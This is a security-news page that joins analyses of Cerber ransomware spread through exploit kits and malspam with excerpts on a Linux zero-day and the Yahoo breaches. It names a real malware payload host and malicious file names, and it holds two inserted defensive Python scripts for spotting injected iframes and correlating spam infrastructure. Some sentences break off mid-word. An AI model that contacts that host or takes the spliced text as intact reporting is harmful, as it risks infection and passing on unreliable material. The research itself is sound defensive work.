Information Security News
"One, if by land, and two, if by sea" is a phrase used by American poet Henry Wadsworth Longfellow in his poem "Paul Revere's Ride," first published in 1861. Longfellow's poem tells a somewhat fictionalized tale of Paul Revere in 1775 during the American Revolution. If British troops came to attack by land, Paul would hang one lantern in a church tower as a signal light. If British troops came by sea, Paul would hang two lanterns.
Much like the British arriving by land or by sea, Cerber ransomware has two main routes from which to rob your critical data of its independence. The first and most widely-used route is through email or malicious spam (malspam). The second route is through exploit kits (EKs).
Am I comparing colonial era British troops to Cerber ransomware in our current cyber landscape? You bet I am! Is it an accurate comparison? Probably not!
Nonetheless, when I think of Cerber, I often think "One, if by email, two, if by exploit kit."
Yesterday's diary reviewed Cerber through email, so I've already hung that lantern. Today I'll hang another lantern as we look at examples of Cerber ransomware through EKs.
As I've discussed before, EKs are merely a method to distribute malware. Criminal groups establish campaigns utilizing EKs to distribute their malware. I often see indicators of campaigns that use Magnitude EK or Rig EK to distribute Cerber ransomware.
In my lab environment, I generally don't generate much Magnitude EK. Why? Because Magnitude usually happens through a malvertising campaign, and that's quite difficult to replicate. By the time any particular malvertisement's indicators are known, the criminals have moved to a new malvertisement.
Since early October 2016, I've typically seen Cerber ransomware from the pseudoDarkleech campaign using Rig EK. PseudoDarkleech currently uses a variant of Rig EK that researcher Kafeine has designated as Rig-V, because it's a "VIP" version that's evolved from the old Rig EK.
EITest is another major campaign that utilizes EKs to distribute malware. Although EITest distributes a variety of malware, I'll occasionally see Cerber sent by this campaign.
On Thursday 2016-12-15, I generated two examples of EK-based campaigns delivering Cerber ransomware. One was from the pseudoDarkleech campaign, and the other was from EITest.
Shown above: Flow chart for both infections.
Both pseudoDarkleech and EITest use legitimate websites to kick off an infection chain. These websites are compromised, and if conditions are right, pages from these compromised sites have injected script. The injected script generates an iframe with an EK landing page URL. Each campaign has distinct patterns of injected script.
Shown above: EITest script pointing to Rig-V on 2016-12-15.
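The injection pattern described above (compromised page, injected script, hidden iframe to an off-site EK landing page) is something a defender can look for in crawled or proxied HTML. The following is an added example, not code from the diary, of a small stdlib-only scanner that flags two of the common shapes: a hidden or tiny iframe whose src points off-site, and an inline script that writes such an iframe via document.write. The sample page and the hostnames ending in .invalid are constructed for the example; the heuristics are generic and will not match every campaign's obfuscation.

```python
"""Flag injected iframes pointing to an off-site landing page (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect <iframe> attributes and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []      # attribute dicts, one per <iframe>
        self.scripts = []      # raw text of each inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as raw data (CDATA mode)
        if self._in_script:
            self._buf.append(data)


def _tiny(value):
    digits = (value or "").strip().lower().rstrip("px")
    return digits.isdigit() and int(digits) <= 2


def _is_hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or _tiny(attrs.get("width")) or _tiny(attrs.get("height")))


def find_suspicious_iframes(page_url, html):
    """Return (kind, src) for iframes that are hidden and point off-site,
    plus iframes written from inline script that point off-site."""
    site = urlparse(page_url).hostname
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname
        if host and host != site and _is_hidden(attrs):
            findings.append(("iframe", src))
    # document.write('<iframe src="...">') is a classic injection shape
    iframe_in_js = re.compile(r'<iframe[^>]*src=["\']?([^"\'\s>]+)', re.I)
    for body in parser.scripts:
        for match in iframe_in_js.finditer(body):
            src = match.group(1)
            host = urlparse(src).hostname
            if host and host != site:
                findings.append(("script", src))
    return findings


# Constructed sample: one legitimate same-site iframe, one injected tiny
# off-site iframe, and one iframe written by injected script.
SAMPLE_PAGE_URL = "http://www.example.com/index.html"
SAMPLE_HTML = """<html><body>
<h1>Compromised site (constructed sample)</h1>
<iframe src="http://www.example.com/widget" width="300" height="200"></iframe>
<iframe src="http://ek-landing.invalid/?id=1" width="1" height="1"
        style="position:absolute; left:-9999px"></iframe>
<script>
document.write('<iframe src="http://ek-landing2.invalid/gate" width=1 height=1></iframe>');
</script>
</body></html>"""


if __name__ == "__main__":
    for kind, src in find_suspicious_iframes(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{kind}: {src}")
```

Run against a saved copy of a page to see which iframes would be reported; the same-site widget iframe is ignored, while the two off-site ones are listed. A real deployment would add the campaign-specific script patterns the diary refers to, which change over time.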
Looking at the infection traffic in Wireshark, you'll find Rig-V with different domain names, but the same IP address both times. For both infections, I could not reach the page for the Cerber decryption instructions. The server didn
Shown above: Second infection (EITest) Rig-V on 2016-12-15.
Patterns for Rig-V and Cerber haven't changed much since my previous diary covering the pseudoDarkleech campaign on 2016-10-14. Only the domains and IP addresses are different.
The infected Windows desktop
Below is an image of the desktop from an infected Windows host. These samples of Cerber dropped an image to the desktop along with an .hta file containing the decryption instructions.
Shown above: My copies of poems by Henry Wadsworth Longfellow... All gone!
Indicators of Compromise (IOCs)
The following are IOCs for the infection traffic I generated:
The following are file hashes and other info for the Flash exploit and Cerber ransomware:
File description: Rig-V Flash exploit seen on 2016-12-15
File description: Cerber ransomware sent by Rig-V from the pseudoDarkleech campaign on 2016-12-15
File description: Cerber ransomware sent by Rig-V from the EITest campaign on 2016-12-15
Pcap and malware for this diary can be found here.
As always, properly-administered Windows hosts are not likely to be infected by pseudoDarkleech, EITest, and other campaigns. As long as your Windows host is up-to-date and fully patched, your risk is minimal. If you

Paul said to his friend,
And I on the opposite shore will be,
Ready to respond and spread the alarm
Through every IT department and server farm,
For the company's folk to be up and to arm.
Shown above: What really happened with Paul the incident responder.
brad [at] malware-traffic-analysis.net
If you run a mainstream distribution of Linux on a desktop computer, there's a good chance security researcher Chris Evans can hijack it when you do nothing more than open or even browse a specially crafted music file. And in the event you're running Chrome on the just-released Fedora 25, his code-execution attack works as a classic drive-by.
The zero-day exploits, which Evans published on Tuesday, are the latest to challenge the popular conceit that Linux, at least in its desktop form, is more immune to the types of attacks that have felled Windows computers for more than a decade and have increasingly snared Macs in recent years.
While Evans' attacks won't work on most Linux servers, they will reliably compromise most desktop versions of Linux, which employees at Google, Facebook, and other security-conscious companies often use in an attempt to avoid the pitfalls of Windows and Mac OS X. Three weeks ago, Evans released a separate Linux zero-day that had similarly dire consequences.
by Sean Gallagher
In October of 2013, as a result of documents leaked by Edward Snowden, we learned the National Security Agency tapped straight into the connections between data centers at Yahoo and Google as part of a program called MUSCULAR. A month later, Yahoo announced it would encrypt all of its internal networks between data centers and add Secure Socket Layer encryption and secure (HTTPS) Web connections to all its services.
That move, however, failed to prevent two major breaches of user data: a breach affecting user data from more than 500 million user accounts late in 2014 (revealed in September) and the breach revealed yesterday involving data from more than 1 billion accounts. The recent break took place in August of 2013—before the barn door was closed. In addition, Yahoo's chief information security officer, Bob Lord, said that the parties behind the 2014 breach had stolen some of Yahoo's code and used it to forge Web "cookies" that gave access to users' accounts without the need to use login credentials.
Evidence of the August 2013 breach was given to Yahoo by "law enforcement officials," according to Lord, but it was likely discovered by a security researcher watching for data on underground markets. That suggests the data was in circulation in underground marketplaces in one form or another and actively in use by Internet criminal rings for a variety of purposes. If that's the case, then practically all of Yahoo's users who set up accounts prior to 2013 may have had details from their accounts used in targeted attacks, attempts to gain access to other Web accounts and cloud services, or any number of other scams.
Last month on 2016-11-22, I saw 10 items of malicious spam (malspam) sent to my spam folder. The messages all had links to malware. Unfortunately, by the time I examined those emails, the links were no longer active. I sent a tweet about it and moved on to other things.
Flash forward to this week. On Tuesday 2016-12-13, @malwrhunterteam noticed the same type of malspam. I checked my spam folder and found another four similar messages. This time, the links were still active, and I generated a full chain of infection traffic. That wave of malspam distributed Cerber ransomware.
The very next day on Wednesday 2016-12-14, I noticed another two messages in my spam folder with the same characteristics using a different domain. This wave of malspam also distributed Cerber ransomware.
Today's diary looks at indicators from these three waves of malspam. Perhaps we can get a better idea of the actor behind this activity.
Chain of events
The four emails from 2016-12-13 have links that downloaded a .js file. In my lab environment, double-clicking the .js file downloaded and installed Cerber ransomware. The two emails from 2016-12-14 have a link for a Microsoft Word document. The Word document has a malicious macro.
Shown above: Data on the malspam (part 2 of 2).
Below are the recipient email addresses in the malspam I received during all three waves:
Below are the subject lines I saw for each of the three waves:
For each wave I saw, the emails all came from the same mail server. These servers also hosted the malicious links within the malspam. The servers were:
Based on the domain names and IP addresses, the criminals likely abused commercially available services. Below is the registration info and date registered for each domain.
All domains used a privacy guard service for the registration info, and all domains used name servers from cloudflare.com. Below is information on the IP addresses hosting the malspam domains:
Links from the emails were unique for each email during the first two waves.
Shown above: Links from the emails.
For details, see the spreadsheet available here.
In both waves I have traffic for, the same URL for the Cerber ransomware executable was generated, whether it was the .js file from 2016-12-13 or the .doc macro from 2016-12-14.
Shown above: .doc macro from 2016-12-14 getting the Cerber executable.
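The attribution reasoning in this diary rests on shared infrastructure across the waves: each wave's links were hosted on the same server that sent the mail, every domain sat behind a privacy-guard registration with cloudflare.com name servers, and the two waves with traffic fetched Cerber from the same URL. The block below is an added example, not the diary's own tooling, that encodes those observations as per-wave records and computes which traits are common to all waves and how much any two waves overlap. The records are constructed: ggjghhfhfh.com is the payload host named in the diary, while the link-host names ending in .invalid, the TEST-NET IP addresses and the name-server labels are placeholders, not the diary's real IOCs.

```python
"""Correlate malspam waves by shared infrastructure (added example)."""
from collections import Counter
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class MalspamWave:
    date: str
    sender_server_ip: str        # IP of the mail server that delivered the wave
    link_host: str               # domain in the emailed links
    link_host_ip: str            # where that domain resolved at the time
    payload_host: Optional[str]  # host serving the Cerber executable, if traffic was captured
    registrar_privacy: bool      # WHOIS hidden behind a privacy-guard service?
    nameservers: Tuple[str, ...] # authoritative name servers for link_host


def nameserver_provider(ns):
    """Reduce 'foo.ns.cloudflare.com' to the provider's registrable name."""
    return ".".join(ns.lower().rstrip(".").split(".")[-2:])


def wave_traits(wave):
    """Per-wave booleans and sets that attribution reasoning tends to use."""
    return {
        "links_on_sender": wave.sender_server_ip == wave.link_host_ip,
        "privacy_whois": wave.registrar_privacy,
        "ns_providers": {nameserver_provider(ns) for ns in wave.nameservers},
    }


def shared_traits(waves):
    """Traits that hold for every wave, plus payload hosts reused across waves."""
    traits = [wave_traits(w) for w in waves]
    payload_counts = Counter(w.payload_host for w in waves if w.payload_host)
    return {
        "links_on_sender": all(t["links_on_sender"] for t in traits),
        "privacy_whois": all(t["privacy_whois"] for t in traits),
        "ns_providers": set.intersection(*(t["ns_providers"] for t in traits)),
        "reused_payload_hosts": {h for h, n in payload_counts.items() if n > 1},
    }


def overlap(a, b):
    """Count concrete infrastructure attributes two waves share (0..5)."""
    return sum([
        a.sender_server_ip == b.sender_server_ip,
        a.link_host == b.link_host,
        a.link_host_ip == b.link_host_ip,
        a.payload_host is not None and a.payload_host == b.payload_host,
        bool(wave_traits(a)["ns_providers"] & wave_traits(b)["ns_providers"]),
    ])


# Constructed records mirroring the diary's three waves; only the payload
# host is taken from the diary, everything else is a placeholder value.
WAVES = [
    MalspamWave("2016-11-22", "192.0.2.10", "wave1-links.invalid", "192.0.2.10",
                None, True, ("ada.ns.cloudflare.com", "bob.ns.cloudflare.com")),
    MalspamWave("2016-12-13", "198.51.100.20", "wave2-links.invalid", "198.51.100.20",
                "ggjghhfhfh.com", True, ("cid.ns.cloudflare.com", "dee.ns.cloudflare.com")),
    MalspamWave("2016-12-14", "203.0.113.30", "wave3-links.invalid", "203.0.113.30",
                "ggjghhfhfh.com", True, ("eve.ns.cloudflare.com", "fay.ns.cloudflare.com")),
]


if __name__ == "__main__":
    for key, value in shared_traits(WAVES).items():
        print(f"{key}: {value}")
    print("overlap(wave2, wave3) =", overlap(WAVES[1], WAVES[2]))
```

Feeding real records in place of the placeholders gives a quick, repeatable summary of which observations actually hold across every wave, which is the part of attribution that is easy to overstate from memory.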
The ransomware was different each day, each with a different file hash, and each with different IP addresses and domains during the post-infection traffic.
Shown above: Windows desktop from the 2016-12-13 infection.
Below are indicators of compromise (IOCs) for traffic generated from the 2016-12-13 wave of malspam:
Below are IOCs for traffic generated from the 2016-12-14 wave of malspam:
Below is information for the associated .js file, .doc file, and Cerber ransomware executables:
File name: Domain_Abuse_Report_Viewer.js
File description: Cerber downloaded by .js file from ggjghhfhfh.com on 2016-12-13
File name: Invoice_349KL.doc
File description: Cerber downloaded by Word macro from ggjghhfhfh.com on 2016-12-14
A copy of the infection traffic, associated emails, malware, and artifacts can be found here.
Other people have noticed these malspam runs, and they've gotten some public attention through various blogs [3, 4, 5]. They never last long. I assume that's because the associated IOCs are reported fairly quickly, and the emails I've seen always get flagged as spam.
Fortunately, best security practices will help prevent infections like the ones in today's diary. A good email filtering system, properly administered Windows hosts, and an educated workforce mean users are much less likely to be infected.
Nonetheless, I assume this activity is somehow profitable for the people behind it. The criminals must be having some sort of success with these Cerber ransomware malspam runs. Why else would it keep happening?
brad [at] malware-traffic-analysis.net